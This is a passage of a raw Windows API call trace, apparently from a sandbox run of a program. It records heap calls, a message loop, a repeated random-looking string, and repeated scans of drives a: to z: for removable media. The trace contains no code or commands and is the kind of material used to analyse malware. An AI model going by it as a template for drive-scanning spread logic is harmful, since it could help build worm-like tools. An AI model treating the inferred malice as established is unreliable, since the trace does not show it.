(HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.330] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.330] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.330] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.331] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.331] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.331] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.331] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.331] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.331] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.331] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.331] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0217.331] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0217.331] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.331] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.331] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.331] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0217.332] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e240 | out: hHeap=0x12c0000) returned 1 [0217.332] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.332] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0217.332] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0217.332] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.332] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.333] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.333] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.333] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0217.333] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0217.334] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.334] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.334] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.334] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.334] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.334] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.335] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.335] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.335] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.335] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.335] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.336] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.336] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.336] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.337] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.337] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.337] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.337] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.337] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.338] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.338] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.338] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.338] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.338] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.339] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.339] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.339] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0217.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0217.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0217.340] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0217.340] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0217.341] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0217.341] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0217.341] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0217.341] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0217.341] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0217.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0217.341] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.342] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260a0 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0217.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0217.342] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0217.342] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0217.342] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.342] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.342] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0217.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0217.343] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318cc0 [0217.343] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318cc0 | out: hHeap=0x12c0000) returned 1 [0217.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.343] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.343] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.343] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0217.344] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.344] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.344] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.344] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.344] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.344] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.345] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.345] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.345] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.345] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.345] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.346] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.346] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.346] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.346] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.346] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.347] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.347] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.347] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.347] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.347] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.348] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.348] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.348] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0217.348] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0217.348] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0217.349] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.349] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0217.350] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0217.350] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0217.350] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0217.351] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.351] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0217.351] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0217.351] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0217.351] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0217.352] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0217.352] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0217.352] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd310 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0217.352] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0217.352] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0217.352] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0217.353] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0217.353] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0217.353] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0217.353] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0217.353] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0217.353] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0217.353] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0217.353] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0217.353] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0217.353] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0217.354] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0217.354] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0217.354] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0217.354] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0217.354] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0217.355] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0217.355] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0217.355] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0217.355] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0217.355] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0217.356] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0217.356] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0217.356] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0217.356] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0217.356] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0217.357] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0217.357] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 